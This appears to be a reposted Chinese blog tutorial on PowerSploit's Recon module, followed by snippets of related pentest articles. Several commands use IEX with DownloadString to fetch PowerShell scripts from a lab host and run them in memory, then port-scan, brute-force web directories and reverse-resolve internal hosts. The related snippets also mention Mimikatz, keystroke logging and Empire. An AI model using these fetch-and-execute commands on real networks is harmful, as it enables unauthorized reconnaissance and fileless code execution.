POWERSPLOIT-Recon(信息侦察)脚本渗透实战

最新推荐文章于 2023-03-03 03:06:00 发布
最新推荐文章于 2023-03-03 03:06:00 发布
阅读量160 收藏
点赞数
原文链接:http://www.cnblogs.com/-qing-/p/10544271.html
版权

Recon(信息侦察)模块

 

a) 调用invoke-Portscan扫描内网主机的端口。

1)通过IEX下载并调用invoke-portscan。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-Portscan.ps1")

 

PS C:\Users\Administrator> Invoke-Portscan -Hosts 192.168.190.132 -Ports "1-65535"

 

 

 

 

 

b) 调用Get-HttpStatus扫描目标站点的目录。

1)通过IEX下载并调用Get-HttpStatus。

 

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Get-Ht
tpStatus.ps1")

 

 

PS C:\Users\Administrator> Get-HttpStatus -Target www.xxx.com -Path D:\dic.txt

 

c) 调用Invoke-ReverseDnsLookup扫描内网主机的ip对应的主机名。

1)通过IEX下载并调用Invoke-ReverseDnsLookup。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-ReverseDnsLookup.ps1")

PS C:\Users\Administrator> Invoke-ReverseDnsLookup '192.168.190.133'

 

 

 

 

 

 

 

 

 

转载于:https://www.cnblogs.com/-qing-/p/10544271.html

weixin_30653023
关注
mix-recon:用于渗透测试的侦查脚本
05-23
由于没有提供具体的子文件名,我们可以推测 "mix-recon-master" 可能是项目的主分支或者完整版的下载包。通常,"master" 是Git版本控制系统中的默认分支,代表了项目的主线代码。这个文件可能包含了 "mix-recon" 的...
powersploit Invoke-Portscan模块
u013930899的博客
05-07 510
1. Invoke-Portscan模块 Invoke-Portscan是Recon模块下的一个脚本,主要用于端口扫描。 2. 在目标机上下载portscan脚本 PS C:\Users\Administrator> IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/Recon/Invoke-Portscan.ps1") 3. 运行脚本扫描 ...
Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes
weixin_46104215的博客
11-08 506
一、Invoke-Portscan Recon 模块的一个脚本,主要用于端口扫描 1.下载脚本 IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1") 2.扫描 Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444" 二、Invo
PowerShell攻击指南
鸡蛋炒鸡蛋
03-03 5484
什么是powershell?可以简单理解为cmd.exe的扩展。powershell具有灵活性和功能化管理windows系统的能力,powershell脚本文件后缀名是.ps1(数字1)Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的windows版本中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。
扫描内网端口
练习时长两年半的CTF爱好者
01-12 5115
扫描内网端口命令
内网渗透信息收集
qq_48904485的博客
04-25 6148
内网信息收集 一、内网信息收集概述 渗透测试人员进人内网后,面对的是一片“黑暗森林”。所以,渗透测试人员首先需要对当前所处的网络环境进行判断。判断涉及如下三个方面。 我是谁?一对 当前机器角色的判断。 这是哪?一对 当前机器所处网络环境的拓扑结构进行分析和判断。 我在哪?一对 当前机器所处区域的判断。 对当前机器角色的判断,是指判断当前机器是普通Web服务器、开发测试服务器、公共服务器、文件服务器、代理服务器、DNS服务器还是存储服务器等。具体的判断过程,是根据机器的主机名、文件、网络连接等情况综合完成
awesome-recon-tools:用于侦察和覆盖的工具汇总列表
02-16
侦察工具一系列工具清单侦察和足迹。 :satellite_antenna: 用于获取网络相关信息的工具。 :bust_in_silhouette: 查找诸如社交网络和电子邮件之类的个人信息的工具,以及邮件的足迹工具。 :glasses: 利用Google命令...
osint-recon:OSINT-Recon是一个专注于自动化侦察过程的项目
03-18
OSINT-Recon是一个仍在开发中的项目,专注于自动化侦察过程。 功能,技术和先决条件 使用 , , 子域枚举; 使用检查子域接管和二阶子域接管问题; 使用和端口扫描和服务检测; 目视检查与; 使用的基于模板的漏洞扫描...
vkontakte-contacts-recon-ng:用于侦察的 Vkontakte 联系人模块
06-05
用于枚举 vkontakte 联系人的recon-ng框架的基本模块。 基于我的脚本。 您需要在 recon-ng 的core/base.py中将 'vkontakte_token' 添加到 KEY_RESOURCES。 然后你必须检索 VK 的令牌 - , 。 如果您不想采用完整...
recon-raven:渗透测试和漏洞赏金的侦察工具
04-27
渗透测试和漏洞赏金的侦察工具 如何安装? #> ./install.sh 用法 #> rraven 或者 #> ruby rranven.rb 支持功能和待办事项清单 子域发现(模糊) 子域接管漏洞 子域ping(连接检查) 端口扫描和子域端口扫描 ...
PowerScan:用于侦察和狩猎的PowerShell脚本
02-17
功率扫描 PowerScan运行针对网络范围或Active Directory域计算机的PowerShell脚本块。 此工具旨在在本地运行PowerShell代码,以便以多线程方式安静地查询多个主机。 如果需要在远程主机上运行PowerShell脚本块,请参考项目。 PowerScan项目包含各种PowerShell脚本,可以将它们作为脚本块在PowerScan中启动,以进行侦察,后开发或威胁搜寻。 默认情况下,输出将写入当前目录中的CSV文件中。 可以使用-NoCsv开关禁用-NoCsv 。 也可以使用-Quiet开关禁用控制台输出。 功能 侦察 侦察功能需要低权限(通常是域用户)或不需要。 功能 描述 获取网络会话 获取会话信息 Get-NullSessionStatus 检查是否允许与IPC $的空会话 Get-OxidBindings 获取网络接口的地址 获取安全服务
windows扫描域内端口
有勇气的牛排博客
09-22 4144
通过查询目标主机的端口信息,可以了解主机所开放的服务,还可以找出开放服务的漏洞,分析目标网络的拓扑结构等。 1 利用telnet命令进行扫描 Telnet协议是TCP/IP协议族的一员,是Internet远程登录服务的标准协议和主要方式。他为用户提供了在本地计算机上完成远程主机工作的能力。 使用此命令可快速探测某台主机的某个常规高危段鸥是否开放。 1.1 开启telnet 1.2 常用命令 1.2.1 帮助 1.2.2 telnet测试端口 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下.
Powershell 渗透测试工具-Nishang
weixin_33713503的博客
11-09 479
Powershell 渗透测试工具-Nishang 分享到: 作者:V1ct0r 稿费:500RMB(不服你也来投稿啊!) 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 传送门 【技术分享】Powershell 渗透测试工具-Nishang(一) 0x00 介绍 Powershell用于渗透测试其实早...
信息收集--端口探测
Beret-81的博客
09-25 662
探测内网端口1.利用 Telnet 命令进行扫描2.利用 S 扫描器3.利用 Metasploit 端口扫描4.PowerSploit 下的 Invoke-portscan.ps1 模块5.Nishang 下的 Invoke-PortScan 模块 1.利用 Telnet 命令进行扫描 Telnet 协议是 TCP/IP 协议族的一员,是 Internet 远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在使用者计算机上使用 Telnet 程序,可以连接到目标服务器。
无文件渗透实验
一个码农的笔记
03-09 4364
无文件渗透实验—这是60字节webshell的杂技前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》 觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式拓扑设计 拓扑介绍: 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.1
实训周笔记
m0_65453476的博客
04-07 271
Empire简介 Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能 基本使用会涉及以下内容 1.帮助文档 2.设置监听 3.生成木马 4.连接主机和基本使用 5.信息收集 6.权限提升 设置监听步骤如下: listeners #进入监听线程界面 uselistener #设置监听模式 info #查看具体参数设置 set #设置相应参数 execute #开始监听 连接主机
powershell 利用提权empire使用Powersploit的使用
代码审计
04-20 2170
windows 自带的一个组件 https://www.pstips.net/powershell-online-tutorials 信息网站 Powershell是一种命令行shell和脚本环境.通过使用powershell,用户和脚本编写者可以对windows系统进行管理. 优点: Windows7 以上操作系统默认安装. Powershell脚本可以运行在内存中,无需写入磁盘(文件不落地) 可以调用.net类(C#) 可以用来管理活动目录 远程下载payload来执行 Powershell的基本
portscan
Khada_Jhin的博客
09-25 941
简易端口扫描器 python 语言 先记录上最初模型 201909 #-*- coding:utf-8 -*- import socket,sys print ''' Wellcome PORTSCAN! ''' def open(host,port): s = socket.socket() try: s.connect((host,port)) ...
python中paramiko插件
最新发布
10-13
这是pjython中最重要的一个插件,所以我们要先下载到csdn中
Mentor's Calibre nmLVS-Recon: 提升早期设计LVS验证效率
本文档主要探讨了在现代集成电路设计验证周期中,特别是在采用并行化设计流程的情况下,如何通过使用Mentor公司的Calibre®nmLVS-Recon™早期验证工具来提高LVS (Layout Versus Schematic) 验证效率,从而缩短早期...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值